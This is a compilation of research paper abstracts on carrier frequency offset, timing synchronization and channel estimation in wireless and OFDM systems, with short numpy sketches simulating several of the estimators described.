--- paper_title: Timing and Carrier Synchronization With Channel Estimation in Multi-Relay Cooperative Networks paper_content: Multiple distributed nodes in cooperative networks generally are subject to multiple carrier frequency offsets (MCFOs) and multiple timing offsets (MTOs), which result in time varying channels and erroneous decoding. This paper seeks to develop estimation and detection algorithms that enable cooperative communications for both decode-and-forward (DF) and amplify-and-forward (AF) relaying networks in the presence of MCFOs, MTOs, and unknown channel gains. A novel transceiver structure at the relays for achieving synchronization in AF-relaying networks is proposed. New exact closed-form expressions for the Cramer-Rao lower bounds (CRLBs) for the multi-parameter estimation problem are derived. Next, two iterative algorithms based on the expectation conditional maximization (ECM) and space-alternating generalized expectation-maximization (SAGE) algorithms are proposed for jointly estimating MCFOs, MTOs, and channel gains at the destination. Though the global convergence of the proposed ECM and SAGE estimators cannot be shown analytically, numerical simulations indicate that through appropriate initialization the proposed algorithms can estimate channel and synchronization impairments in a few iterations. Finally, a maximum likelihood (ML) decoder is devised for decoding the received signal at the destination in the presence of MCFOs and MTOs. Simulation results show that through the application of the proposed estimation and decoding methods, cooperative systems result in significant performance gains even in presence of impairments. --- paper_title: Bounds and Algorithms for Multiple Frequency Offset Estimation in Cooperative Networks paper_content: The distributed nature of cooperative networks may result in multiple carrier frequency offsets (CFOs), which make the channels time varying and overshadow the diversity gains promised by collaborative communications. This paper seeks to address multiple CFO estimation using training sequences in space-division multiple access (SDMA) cooperative networks. The system model and CFO estimation problem for cases of both decode-and-forward (DF) and amplify-and-forward (AF) relaying are formulated and new closed-form expressions for the Cramer-Rao lower bound (CRLB) for both protocols are derived. The CRLBs are then applied in a novel way to formulate training sequence design guidelines and determine the effect of network protocol and topology on CFO estimation. Next, two computationally efficient iterative estimators are proposed that determine the CFOs from multiple simultaneously relaying nodes. The proposed algorithms reduce multiple CFO estimation complexity without sacrificing bandwidth and training performance. Unlike existing multiple CFO estimators, the proposed estimators are also accurate for both large and small CFO values. Numerical results show that the new methods outperform existing algorithms and reach or approach the CRLB at mid-to-high signal-to-noise ratio (SNR). When applied to system compensation, simulation results show that the proposed estimators significantly reduce average-bit-error-rate (ABER). 
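Several of the cooperative-network entries above (the ECM/SAGE multi-relay estimators and the multiple-CFO bounds) build on the same data-aided single-link step: with a known training sequence s[n], the ML CFO estimate maximises |sum_n r[n] s*[n] exp(-j 2 pi eps n)|, i.e. the peak of a zero-padded FFT of r[n] s*[n]. The sketch below shows only that building block for one link; the multi-node joint estimators in the cited works iterate per-node refinements of it. The sequence length, padding factor, noise level, and CFO value are illustrative assumptions.

```python
import numpy as np

# Single-link, data-aided CFO estimation: remove the known training modulation
# and locate the peak of a zero-padded FFT (a coarse grid of trial CFOs).
rng = np.random.default_rng(5)
L, pad = 256, 16                                   # training length, FFT padding
s = np.exp(2j * np.pi * rng.random(L))             # unit-modulus training symbols
eps_true = 0.0123                                  # CFO in cycles per sample

n = np.arange(L)
r = s * np.exp(2j * np.pi * eps_true * n)
r += 0.1 * (rng.standard_normal(L) + 1j * rng.standard_normal(L))

z = r * np.conj(s)                                 # strip the known modulation
spectrum = np.abs(np.fft.fft(z, pad * L))          # coarse grid of trial CFOs
eps_hat = np.argmax(spectrum) / (pad * L)
if eps_hat > 0.5:                                  # map to the (-0.5, 0.5] range
    eps_hat -= 1.0
print(f"estimated CFO: {eps_hat:.5f} cycles/sample (true {eps_true})")
```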
--- paper_title: The Evolution of Cellular Backhaul Technologies: Current Issues and Future Trends paper_content: The rapid increase of the number of mobile subscribers as well as the deployment of 3G technologies are putting strain on mobile backhaul operational expenditures (OPEX) which amount to 20-40% of total mobile operator's OPEX due to their reliance on T1/E1 copper lines. For these reasons, the current backhaul systems, a term commonly used to describe connectivity between base stations and radio controllers, are increasingly integrating more cost-effective, packet switched technologies, especially Ethernet/Internet technologies. In addition, Wi-Fi and WiMAX are emerging as promising backhaul solutions and initial findings have demonstrated their feasibility. However, the notion of network migration unavoidably raises new technical challenges relevant to aspects of TDM and packet network timing synchronization, QoS, and packet efficiency. This survey aims to provide a comprehensive study of state-of-the-art circuit switched and emerging packet switched backhaul technologies based on research articles and standard documents. For packet switched backhaul, we focus on the practically important Pseudowire approaches which are used to transport TDM services over packet switched networks. We also discuss the features and research findings on the use of Wi-Fi and WiMAX technologies which illustrate their potential for rapid and cost-efficient backhaul deployment. Finally, we highlight some open issues relevant to timing synchronization in wireless mesh backhaul and femtocell deployments, which offer a rich ground for further research. --- paper_title: Relay-based deployment concepts for wireless and mobile broadband radio paper_content: In recent years, there has been an upsurge of interest in multihop-augmented infrastructure-based networks in both the industry and academia, such as the seed concept in 3GPP, mesh networks in IEEE 802.16, and coverage extension of HiperLAN/2 through relays or user-cooperative diversity mesh networks. This article, a synopsis of numerous contributions to Working Group 4 of the Wireless World Research Forum and other research work, presents an overview of important topics and applications in the context of relaying. It covers different approaches to exploiting the benefits of multihop communications via relays, such as solutions for radio range extension in mobile and wireless broadband cellular networks (trading range for capacity), and solutions to combat shadowing at high radio frequencies. Furthermore, relaying is presented as a means to reduce infrastructure deployment costs. It is also shown that through the exploitation of spatial diversity, multihop relaying can enhance capacity in cellular networks. We wish to emphasize that while this article focuses on fixed relays, many of the concepts presented can also be applied to systems with moving relays. --- paper_title: Cooperative diversity in wireless networks: Efficient protocols and outage behavior paper_content: We develop and analyze low-complexity cooperative diversity protocols that combat fading induced by multipath propagation in wireless networks. The underlying techniques exploit space diversity available through cooperating terminals' relaying signals for one another.
We outline several strategies employed by the cooperating radios, including fixed relaying schemes such as amplify-and-forward and decode-and-forward, selection relaying schemes that adapt based upon channel measurements between the cooperating terminals, and incremental relaying schemes that adapt based upon limited feedback from the destination terminal. We develop performance characterizations in terms of outage events and associated outage probabilities, which measure robustness of the transmissions to fading, focusing on the high signal-to-noise ratio (SNR) regime. Except for fixed decode-and-forward, all of our cooperative diversity protocols are efficient in the sense that they achieve full diversity (i.e., second-order diversity in the case of two terminals), and, moreover, are close to optimum (within 1.5 dB) in certain regimes. Thus, using distributed antennas, we can provide the powerful benefits of space diversity without need for physical arrays, though at a loss of spectral efficiency due to half-duplex operation and possibly at the cost of additional receive hardware. Applicable to any wireless setting, including cellular or ad hoc networks-wherever space constraints preclude the use of physical arrays-the performance characterizations reveal that large power or energy savings result from the use of these protocols. --- paper_title: Synchronization Protocols and Implementation Issues in Wireless Sensor Networks: A Review paper_content: Time synchronization in wireless sensor networks (WSNs) is a topic that has been attracting the research community in the last decade. Most performance evaluations of the proposed solutions have been limited to theoretical analysis and simulation. They consequently ignored several practical aspects, e.g., packet handling jitters, clock drifting, packet loss, and mote limitations, which affect real implementation on sensor motes. Authors of some pragmatic solutions followed empirical approaches for the evaluation, where the proposed solutions have been implemented on real motes and evaluated in testbed experiments. This paper gives an insight on issues related to the implementation of synchronization protocols in WSN. The challenges related to WSN environment are presented; the importance of real implementation and testbed evaluation are motivated by some experiments we conducted. The most relevant implementations of the literature are then reviewed, discussed, and qualitatively compared. While there are several survey papers that present and compare the protocols from the conception perspectives, as well as others that deal with mathematical and signal processing issues of the estimators, a survey on practical aspects related to the implementation is missing. To our knowledge, this paper is the first one that takes into account the practical aspect of existing solutions. --- paper_title: Fractionally Spaced Frequency-Domain MMSE Receiver for OFDM Systems paper_content: Based on frequency-domain oversampling and the Bayesian Gauss-Markov theorem, we propose a fractionally spaced frequency-domain minimum mean-square error (FSFDMMSE) receiver for orthogonal frequency-division multiplexing systems. It is shown that frequency diversity inherent in a frequency-selective fading channel can be extracted and exploited by the proposed FSFD-MMSE receiver. This diversity advantage outweighs the effect of intercarrier interference generated by frequency-domain oversampling, due largely to the MMSE receiver's interference suppression capability. 
Numerical results show that the FSFD-MMSE receiver outperforms the conventional MMSE receiver under both ideal and practical situations (i.e., with frequency offset, channel estimation errors, and even doubly selective channel fading). In addition, the FSFD-MMSE receiver only needs a fast Fourier transform size that is no larger than N + Q - 1 (N = number of data subcarriers, and Q = number of resolvable multipath components). --- paper_title: Reconfigurable architecture of a hybrid synchronisation algorithm for LTE paper_content: Time and frequency synchronisation are significant parts of the cell-search procedure and one of the first processing blocks within a mobile communication system. Particularly for an OFDM transmission within an initial synchronisation process, the algorithm has to deal with carrier frequency offsets up to several subcarrier spacings. To be able to still operate under those conditions, the cell-search procedure consists of different processing steps, combined in a hybrid algorithm. Besides good performance properties, hybrid algorithms lead to a high computational demand and implementation effort. To overcome these challenges, flexible architectures, which are able to select the most suitable algorithm during runtime, are the base for an efficient hardware realization. In this paper, as an example, we are introducing a hybrid initial synchronisation algorithm for an LTE system, which still operates under the effect of a carrier frequency offset greater than the subcarrier spacing. Subsequently, we show a reconfigurable architecture as well as the results of an FPGA implementation of the time synchronisation part of that algorithm. The architecture is able to switch between different correlators, namely a reverse-auto, a cross- and a CP-based auto-correlation during runtime, which enables a flexible and low complexity realization of the computationally complex synchronisation process. --- paper_title: Joint Channel and Frequency Offset Estimation for Oversampled Perfect Reconstruction Filter Bank Transceivers paper_content: Recently, DFT-based oversampled perfect reconstruction filter banks (OPRFB), as a special form of filtered multitone, have shown great promise for applications to multicarrier modulation. Still, accurate frequency synchronization and channel equalization are needed for their reliable operation in practical scenarios. In this paper, we first derive a data-aided joint maximum likelihood (ML) estimator of the carrier frequency offset (CFO) and the channel impulse response (CIR) for OPRFB transceiver systems operating over frequency selective fading channels. Then, by exploiting the structural and spectral properties of these systems, we are able to considerably reduce the complexity of the proposed estimator through simplifications of the underlying likelihood function. The Cramer-Rao bound on the variance of unbiased CFO and CIR estimators is also derived. The performance of the proposed ML estimator is investigated by means of numerical simulations under realistic conditions with CFO and frequency selective fading channels. The effects of different pilot schemes on the estimation performance for applications over time-invariant and mobile time-varying channels are also examined. The results show that the proposed joint ML estimator exhibits an excellent performance, where it can accurately estimate the unknown CFO and CIR parameters for the various experimental setups under consideration. --- paper_title: Localized or Interleaved?
A Tradeoff between Diversity and CFO Interference in Multipath Channels paper_content: Carrier frequency offset (CFO) damages the orthogonality between sub-carriers and thus causes multiuser interference in uplink OFDMA/SC-FDMA systems. For a given CFO, such multiuser interference is mainly dictated by channel (sub-carrier) allocation, which also specifies the diversity gain of one user over multi-path channels. In particular, the positions of one user's sub-channels will determine its diversity gain, while the distances between sub-channels of the concerned user and those of others will govern the CFO interference. Two popular channel allocation methods are the localized and interleaved (distributed) schemes where the former has less CFO interference but the latter achieves more diversity gain. In this paper, we will consider the channel allocation scheme for uplink LTE systems by investigating the effects of channel allocation on both of the diversity gain and CFO interference. By combining these two effects, we will propose a semi-interleaved scheme, which achieves full diversity gain with minimum CFO interference. --- paper_title: Efficient OFDM Symbol Timing Estimator Using Power Difference Measurements paper_content: This paper presents an efficient blind symbol timing estimation scheme for orthogonal frequency-division multiplexing (OFDM) systems with constant modulus constellation. The proposed technique is designed to estimate symbol timing offsets by minimizing the power difference between subcarriers with similar indices over two consecutive OFDM symbols based on the assumption that the channel slowly changes over time. The proposed power difference estimator (PDE) is totally blind because it requires no prior information about the channel or the transmitted data. Monte Carlo simulation is used to assess the PDE performance in terms of the probability of correct timing estimate, P_lock-in. Moreover, we propose a new performance metric denoted as the deviation from safe region (DSR). Simulation results have demonstrated that the PDE performs well in severe frequency-selective fading channels and outperforms the other considered estimators. The complexity of the PDE can be significantly reduced by incorporating a low-cost estimator to provide initial coarse timing information. The proposed PDE is realized using feedforward and early-late gate (ELG) configurations. The new PDE-ELG does not suffer from the self-noise problem inherent in other ELG estimators reported in the literature. --- paper_title: Pilot Subset Partitioning Based Integer Frequency Offset Estimation for OFDM Systems With Cyclic Delay Diversity paper_content: Cyclic delay diversity (CDD) is a simple transmit diversity technique for coded OFDM systems with multiple transmit antennas. However, high frequency selectivity caused by CDD degrades the performance of post-FFT estimation, i.e., integer frequency offset (IFO). This paper suggests a simple way of improving the performance of the IFO estimator based on the pilot subset partitioning which is designed to reduce the effect of frequency selective fading by adopting the CDD. By partitioning uncorrelated pilot subcarriers into subsets to satisfy high correlation, and performing frequency estimation for each pilot subset, a robust IFO estimation scheme is derived. The simulation results show that the proposed method can provide benefit to the overall system performance.
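The power-difference timing estimator (PDE) entry above relies on the fact that, with constant-modulus data and a slowly varying channel, the per-subcarrier power of two consecutive OFDM symbols matches only when the FFT window sits in the ISI-free (safe) region. The numpy sketch below evaluates that metric over trial window positions for a toy link; it illustrates the underlying cost function under assumed parameters (OFDM dimensions, channel taps, noise level), not the paper's feedforward or early-late-gate realizations.

```python
import numpy as np

# Blind power-difference timing metric: compare per-subcarrier powers of two
# consecutive OFDM symbols for each trial FFT-window start.
rng = np.random.default_rng(1)
N, CP = 64, 16

def ofdm_symbol():
    data = (rng.choice([1, -1], N) + 1j * rng.choice([1, -1], N)) / np.sqrt(2)
    s = np.fft.ifft(data) * np.sqrt(N)
    return np.r_[s[-CP:], s]                       # prepend the cyclic prefix

tx = np.concatenate([ofdm_symbol() for _ in range(3)])
h = np.array([1.0, 0.5, 0.3j])                     # short multipath channel (< CP)
rx = np.convolve(tx, h)[: len(tx)]
rx += 0.05 * (rng.standard_normal(len(rx)) + 1j * rng.standard_normal(len(rx)))

candidates = range(0, 2 * CP)                      # trial FFT-window start offsets
metric = []
for d in candidates:
    X1 = np.fft.fft(rx[d : d + N])                       # first OFDM symbol
    X2 = np.fft.fft(rx[d + N + CP : d + 2 * N + CP])     # next OFDM symbol
    metric.append(np.sum(np.abs(np.abs(X1) ** 2 - np.abs(X2) ** 2)))

d_hat = candidates[int(np.argmin(metric))]
print(f"estimated start offset: {d_hat} (ISI-free region roughly {len(h) - 1}..{CP})")
```

Any offset inside the ISI-free region keeps the metric near its minimum, which is exactly the "safe region" notion the abstract quantifies with its DSR metric.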
--- paper_title: MCMOE-Based CFO Estimator Aided With the Correlation Matrix Approach for Alamouti's STBC MC-CDMA Downlink Systems paper_content: This paper addresses the estimation problem of carrier frequency offset (CFO) in the downlink transmission of space-time block-coded multicarrier code-division multiple-access (STBC MC-CDMA) systems over multipath fading. This study proposes a multiply constrained minimum output energy (MCMOE)-based blind CFO estimator, which is simply assisted by the presented correlation matrix approach to efficiently achieve the CFO estimate. We formulate a two-level CFO estimator by optimizing the receiver output power, as well as the data correlation matrix. At the first level, all possible CFO candidates are found by evaluating the well-defined estimated merit figure. Then, exploiting multiple constraints in the design of the MCMOE receiver, a criterion is used in level two to determine the exact CFO estimate. Numerical results are presented to verify that both precise CFO estimation and reliable error performance can be achieved, even when the channel is dominated by noise because the impact of CFO on the output signal-to-interference-plus-noise ratio (SINR) and bit error rate (BER) are effectively removed by the proposed CFO estimator. --- paper_title: A practical equalizer for cooperative delay diversity with multiple carrier frequency Offsets paper_content: Cooperative transmission in wireless networks provides diversity gain in multipath fading environments. Among all the proposed cooperative transmission schemes, delay diversity has the advantage of needing less coordination and higher spectrum efficiency. However, in a distributed network, the asynchrony comes from both carrier frequency and symbol timing between the cooperating relays. In this paper, a minimum mean square error fractionally spaced decision feedback equalizer (MMSE-FS-DFE) is developed to extract the diversity with large multiple carrier frequency offsets, its performance approaches the case without multiple carrier frequency offsets. The front end design for the receiver in this scenario is discussed, and a practical frame structure is designed for carrier frequency offsets and channel estimation. A subblock-wise decision-directed adaptive least squares (LS) estimation method is developed to solve the problem caused by error in frequency offset estimation. The purpose of this paper is to provide a practical design for cooperative transmission (CT) with the delay diversity scheme. --- paper_title: Estimation scheme of the receiver IQ imbalance under carrier frequency offset in communication system paper_content: IQ signal processing is widely utilised in today's communication systems. However, it usually faces a common problem of front-end distortion such as IQ imbalance and carrier frequency offset (CFO). Effective algorithms exist for estimating and compensating for IQ imbalance as well as CFO, when the two problems are treated separately. With both effects present, most of those algorithms suffer from degraded quality parameter estimates. In this study, the authors proposed a scheme to estimate and compensate for IQ imbalance in the presence of CFO by using a known preamble of a repeated training sequence. In addition, the authors present a modified algorithm to suit the particular case when CFO is small. The performance of our proposed scheme has been examined with computer simulations on IEEE 802.11a signals. 
It is shown that the proposed method is more robust and renders better performance than the existing method. --- paper_title: Performance study of fast frequency-hopped/M-ary frequency-shift keying systems with timing and frequency offsets over Rician-fading channels with both multitone jamming and partial-band noise jamming paper_content: In this study, the effects of timing and frequency offsets on bit-error rate (BER) performance of fast frequency-hopped M-ary frequency-shift keying communication systems over Rician-fading channels with both multitone jamming (MTJ) and partial-band noise jamming (PBNJ) are investigated. Analytical BER expressions are derived for both linear-combining and product-combining receivers. Numerical results show that under both MTJ and PBNJ conditions, the BER performance falls between the two extreme cases, in which either MTJ or PBNJ is present. It is found that the BER performance is severely degraded as the timing or frequency offset increases. The product-combining receiver is found to be more sensitive to the timing and frequency offsets than the linear-combining receiver. It is also observed that for the linear-combining receiver, the optimum diversity order increases as the timing and frequency offset increases over both Rician-fading and Rayleigh-fading channels; however, the reverse is true for the product-combining receiver. --- paper_title: A Low-Power Low-Cost Design of Primary Synchronization Signal Detection paper_content: Synchronization is an important component of a practical communication system. Furthermore, network entry including synchronization is important. Since the detection of the primary synchronization signal (PSS) is the first step of network entry in long term evolution (LTE) systems, it may be a critical path for practical systems. Therefore, the tradeoff between performance, low power consumption, and low cost of PSS detection needs to be made carefully. This paper presents a new synchronization method for low power and low cost design. The approach of a 1-bit analog-to-digital converter (ADC) with down-sampling is compared with that of a 10-bit ADC without down-sampling under multi-path fading conditions defined in the LTE standard for user equipment (UE) performance tests. The simulation results of PSS are obtained on several kinds of channels. The simulation results explicitly show that the performance of the method with down-sampling for 1-bit ADC does not degrade even if frequency offset exists. Based on the simulation results, different implementation architectures and their synthesis reports and analysis are presented. A low-power low-cost design with high performance to detect PSS is derived in this paper. --- paper_title: Improved Detection of Uplink OFDM-IDMA Signals with Carrier Frequency Offsets paper_content: This letter proposes an improved detection scheme to mitigate the influence of carrier frequency offsets (CFOs) in uplink orthogonal frequency division multiplexing-interleave division multiple access (OFDM-IDMA) systems. The basic principle is to iteratively estimate and cancel the combined interference from multiple users and CFOs at the receiver so that the additional interference due to the residual CFOs from other users can be suppressed. Simulation results show that the proposed scheme can effectively eliminate the interference and significantly improve the system performance in the presence of CFOs.
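The low-power PSS detection entry above ultimately reduces to correlating the received samples against a locally generated Zadoff-Chu sequence. The sketch below shows that matched-correlation step with a generic length-63 Zadoff-Chu sequence standing in for the LTE PSS (the actual PSS punctures its middle element, is mapped around DC, and a practical detector must also handle CFO, fading, and quantization such as the 1-bit ADC studied in the paper); the embedding position, phase offset, and noise level are illustrative assumptions.

```python
import numpy as np

# Matched correlation against a Zadoff-Chu sequence as a stand-in for PSS detection.
rng = np.random.default_rng(2)

def zadoff_chu(root, length):
    n = np.arange(length)
    return np.exp(-1j * np.pi * root * n * (n + 1) / length)

zc = zadoff_chu(root=25, length=63)          # root 25 is one of the LTE PSS roots
noise = (rng.standard_normal(1000) + 1j * rng.standard_normal(1000)) / np.sqrt(2)
rx = 0.3 * noise
rx[400:463] += zc * np.exp(1j * 0.7)         # embed the sequence with a phase offset

corr = np.abs(np.correlate(rx, zc, mode="valid"))   # numpy conjugates the 2nd arg
peak = int(np.argmax(corr))
print(f"correlation peak at sample {peak} (sequence embedded at 400)")
```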
--- paper_title: A computationally efficient sampling frequency offset estimation for OFDM-based digital terrestrial television systems paper_content: Sampling frequency offset (SFO) that occurs due to a sampling frequency mismatch between the transmitter and receiver oscillators is one of the main problems in orthogonal frequency division multiplexing (OFDM) based digital terrestrial television (DTTV) systems. The SFO can cause intersymbol interference and intercarrier interference that may degrade the performance of an OFDM system and result in a high bit error rate. Since the value of SFO is usually very low (part per million scale), the SFO estimation is very susceptible to noise. In this paper, we propose an estimation method that can minimize the influence of noise in SFO estimation and also minimize the computational complexity. The performance of the proposed method has been verified with computer simulation. The computer simulation results show that the proposed sampling frequency offset estimation is more efficient in computational complexity than the conventional method while achieving similar performance. --- paper_title: A SAGE Approach to Frequency Recovery in OFDM Direct-Conversion Receivers paper_content: In-phase/quadrature (I/Q) imbalances are front-end impairments which may greatly complicate the synchronization task in a low-cost direct-conversion receiver (DCR). In this paper we investigate the possibility of using the space-alternating generalized expectation-maximization (SAGE) algorithm to recover the carrier frequency offset in OFDM terminals with a DCR architecture. Our study leads to a novel scheme that operates in a recursive fashion and exploits a conventional OFDM training preamble composed of several repeated parts. At each iteration, interference arising from I/Q impairments is subtracted from the received samples before updating the frequency estimate. The performance of the new scheme is assessed in terms of estimation accuracy and processing load by considering a wireless local area network (WLAN) compliant with the IEEE 802.11a standard. The main goal is to check whether the SAGE approach exhibits some advantages compared to existing alternatives. --- paper_title: Joint Estimation of Channel Impulse Response and Carrier Frequency Offset for OFDM Systems paper_content: In this paper, an order recursive method is proposed to solve the joint estimation of channel impulse response (CIR) and carrier frequency offset (CFO) for orthogonal frequency-division multiplexing (OFDM) transmission. As long as one can obtain the solution for Qth-order Taylor expansion, the solution for (Q + 1)th order can also be obtained via a simple recursive relation. The proposed recursive algorithm actually provides a method to handle any Qth-order Taylor expansion, instead of just the second order adopted in the technical literature. Significant improvement can be observed by adopting higher order approximation. Analytical mean-square-error (MSE) performance results are given, demonstrating the efficiency of the proposed algorithm. --- paper_title: FADAC-OFDM: Frequency-Asynchronous Distributed Alamouti-Coded OFDM paper_content: We propose frequency-asynchronous distributed Alamouti-coded orthogonal frequency-division multiplexing (FADAC-OFDM). The proposed scheme effectively mitigates the intercarrier interference (ICI) due to frequency offset (FO) between two distributed antennas.
The transmitter side of the proposed scheme transmits each of the two subslots in Alamouti code through two remote subcarriers symmetric to the center frequency and is referred to as space–frequency reversal schemes by Wang et al. or Choi. The receiver side of the proposed scheme is significantly different from the conventional scheme or the scheme proposed by Wang et al. in that it performs two discrete Fourier transform (DFT), each of which is synchronized to each transmit antenna's carrier frequency. The decision variables are generated by performing a simple linear combining with the same complexity as that of the conventional Alamouti code. The derivation shows that in flat-fading channels, the dominant ICI components due to FO cancel each other during the combining process. The proposed scheme achieves almost the same performance as the ideal Alamouti scheme, even with large FO. To use this ICI self-cancellation property for selective fading channels or in cases with timing offset (TO) between two transmit antennas, the total subcarriers are divided into several subblocks, and the proposed scheme is applied to each subblock. For mildly selective channels or cases with practically small TO, the proposed scheme achieves significantly improved performance compared with the conventional space–frequency Alamouti-coded OFDM. --- paper_title: Modeling and Estimation of Transient Carrier Frequency Offset in Wireless Transceivers paper_content: Future wireless devices have to support many applications (e.g., remote robotics, wireless automation, and mobile gaming) with extremely low latency and reliability requirements over wireless connections. Optimizing wireless transceivers while switching between wireless connections with different circuit characteristics requires addressing many hardware impairments that have been overlooked previously. For instance, switching between transmission and reception radio functions to facilitate time-division duplexing can change the load on the power supply. As the supply voltage changes in response to the sudden change in load, the carrier frequency drifts. Such a drift results in transient carrier frequency offset (CFO) that cannot be estimated by conventional CFO estimators and is typically addressed by inserting or extending guard intervals. In this paper, we explore the modeling and estimation of the transient CFO, which is modeled as the response of an underdamped second order system. To compensate for the transient CFO, we propose a low complexity parametric estimation algorithm, which uses the null space of the Hankel-like matrix constructed from phase difference of the two halves of the repetitive training sequence. Furthermore, to minimize the mean squared error of the estimated parameters in noise, a weighted subspace fitting algorithm is derived with a slight increase in complexity. The Cramer-Rao bound for any unbiased estimator of the transient CFO parameters is derived. The performance of the proposed algorithms is also confirmed by the experimental results obtained from the real wireless transceivers. --- paper_title: Carrier frequency synchronization in the downlink of 3GPP LTE paper_content: In this paper, we investigate carrier frequency synchronization in the downlink of 3GPP Long Term Evolution (LTE). A complete carrier frequency offset estimation and compensation scheme based on standardized synchronization signals and reference symbols is presented. 
The estimation performance in terms of mean square error is derived analytically and compared to simulation results. The impact of estimation error on the system performance is shown in terms of uncoded bit error ratio and physical layer coded throughput. Compared to perfect synchronization, the presented maximum likelihood estimator shows hardly any performance loss, even when the most sophisticated MIMO schemes of LTE are employed. --- paper_title: MMSE Solution for OFDMA Systems with Carrier Frequency Offset Correction paper_content: The multi-access orthogonal frequency division multiplexing (OFDMA) technology has drawn a lot of attention in next generation wireless mobile communications. It is well-known that carrier frequency offsets in OFDMA systems can destroy the orthogonality among subcarriers and produce intercarrier interference (ICI) and multiuser interference (MUI). In our previous works, we proposed a common carrier frequency offset (CCFO) correction scheme at the OFDMA receiver, which can reduce the ICI/MUI effect and the bit error rate. In the scheme, the CFO correction can be performed by adaptively converging the MSE between the demodulated output and the decision feedback data. This paper studies the minimum MSE solution for the CCFO value, and the result is exploited to verify the adaptive CCFO estimation algorithm by means of the decision feedback. Simulation results show that the adaptive decision feedback scheme for CCFO estimation is effective and the minimum MSE performance is well achieved. --- paper_title: Carrier Frequency Offset Estimation for OFDM Systems Over Mobile Radio Channels paper_content: In this paper, a new technique is proposed for blind estimation of carrier frequency offset (CFO) in wireless orthogonal frequency-division multiplexing (OFDM) systems with constant-modulus constellations. The proposed scheme is based on the assumption that the channel slowly changes in the time domain with respect to the OFDM symbol duration. As a consequence, the channel effect on a given subcarrier in two consecutive OFDM symbols is approximately the same. Based on this assumption, a cost function is derived such that the power difference between all subcarriers in two consecutive OFDM symbols is minimized. Using Monte Carlo simulation, we demonstrate that the proposed scheme has superior performance in both static and time-varying frequency-selective fading channels. The proposed system can rapidly and accurately estimate the CFO using only three trial values, given that the CFO is less than half of the subcarriers' frequency spacing. --- paper_title: Sensitivity analysis of interleaved OFDMA system uplink to carrier frequency offset paper_content: This paper investigates the sensitivity analysis of orthogonal frequency division multiple access (OFDMA) systems to carrier frequency offset (CFO) in the uplink. This analysis uses simple superposition principle approach, where the effects of different users are studied separately. We calculate a closed-form expression for signal-to-interference ratio (SIR) and derive very simple expressions for inter-carrier interference (ICI) and multiple access interference (MAI) in interleaved subcarrier allocation scheme. Finally theoretical results are verified using Monte Carlo simulation. 
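The blind CFO estimator for mobile radio channels described above minimises the power difference between subcarriers of two consecutive OFDM symbols, exploiting constant-modulus constellations and a slowly varying channel. The numpy sketch below evaluates that cost over an exhaustive grid of trial CFOs instead of the paper's three-trial-value search; the OFDM dimensions, channel taps, and noise level are illustrative assumptions.

```python
import numpy as np

# Blind CFO search: de-rotate with a trial CFO, then compare per-subcarrier
# powers of two consecutive constant-modulus OFDM symbols. Only the correct
# trial removes the ICI, so the cost is minimised at the true offset.
rng = np.random.default_rng(6)
N, CP = 64, 16
eps_true = 0.21                                    # CFO in subcarrier spacings

def ofdm_symbol():
    data = (rng.choice([1, -1], N) + 1j * rng.choice([1, -1], N)) / np.sqrt(2)
    s = np.fft.ifft(data) * np.sqrt(N)
    return np.r_[s[-CP:], s]

tx = np.concatenate([ofdm_symbol(), ofdm_symbol()])
h = np.array([1.0, 0.4, 0.2j])                     # slowly varying multipath channel
rx = np.convolve(tx, h)[: len(tx)]
rx *= np.exp(2j * np.pi * eps_true * np.arange(len(rx)) / N)
rx += 0.03 * (rng.standard_normal(len(rx)) + 1j * rng.standard_normal(len(rx)))

trials = np.arange(-0.5, 0.5, 0.01)
cost = []
for eps in trials:
    d = rx * np.exp(-2j * np.pi * eps * np.arange(len(rx)) / N)
    X1 = np.fft.fft(d[CP : CP + N])                    # symbol 1, ISI-free window
    X2 = np.fft.fft(d[N + 2 * CP : 2 * N + 2 * CP])    # symbol 2, ISI-free window
    cost.append(np.sum(np.abs(np.abs(X1) ** 2 - np.abs(X2) ** 2)))

eps_hat = trials[int(np.argmin(cost))]
print(f"estimated CFO: {eps_hat:.2f} subcarrier spacings (true {eps_true})")
```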
--- paper_title: Maximum likelihood algorithms for joint estimation of synchronisation impairments and channel in multiple input multiple output–orthogonal frequency division multiplexing system paper_content: Maximum likelihood (ML) algorithms for the joint estimation of synchronisation impairments and channel in multiple input multiple output–orthogonal frequency division multiplexing (MIMO–OFDM) systems are investigated in this work. A system model that takes into account the effects of carrier frequency offset, sampling frequency offset, symbol timing error and channel impulse response is formulated. Cramer–Rao lower bounds for the estimation of continuous parameters are derived, which show the coupling effect among different impairments and the significance of the joint estimation. The authors propose an ML algorithm for the estimation of synchronisation impairments and channel together, using the grid search method. To reduce the complexity of the joint grid search in the ML algorithm, a modified ML (MML) algorithm with multiple one-dimensional searches is also proposed. Further, a stage-wise ML (SML) algorithm using existing algorithms, which estimate a smaller number of parameters, is also proposed. Performance of the estimation algorithms is studied through numerical simulations and it is found that the proposed ML and MML algorithms exhibit better performance than the SML algorithm. --- paper_title: A Semidefinite Relaxation Approach to Blind Despreading of Long-Code DS-SS Signal With Carrier Frequency Offset paper_content: Blind despreading of long-code direct sequence spread spectrum (DS-SS) signal with unknown carrier frequency offset (CFO) is considered. The maximum likelihood estimate (MLE) of spreading waveform is first derived, and to cope with the unknown CFO, we then use the semidefinite relaxation (SDR) technique to approximate our MLE problem as a convex semidefinite programming (SDP) problem, which can be solved efficiently using modern convex optimization methods. Simulation results demonstrate that the proposed approach significantly outperforms the dominant mode despreading estimator whether or not CFO exists at low signal to noise ratio (SNR). --- paper_title: Joint AOD and CFO estimation in wireless sensor networks localization system paper_content: A self-localization system for wireless sensor networks based on angle of departure (AOD) is studied in this paper. In the AOD model, an anchor node with multiple antennas transmits orthogonal pilot signals to a single-antenna sensor node, which effectively allows the sensor node to function as if it were equipped with multiple antennas. Given that the limited number of antennas at anchor nodes will result in a degree of freedom (DOF) deficiency at the sensor node when dealing with more multipath components (MPC), we adopt a novel method without requiring extra antennas. The proposed algorithm simultaneously accounts for the oscillator mismatch between the anchor node and the sensor node, i.e., the carrier frequency offset (CFO). With the aid of the anchor's movement and the CFO, the equivalent antenna array at the sensor node is expanded by a synthetic aperture procedure to a much larger one, which subsequently improves the ability to estimate the MPCs. In addition, closed-form solutions for the CFO and AOD are also derived. The effectiveness and performance of the proposed algorithm are demonstrated by numerical simulations.
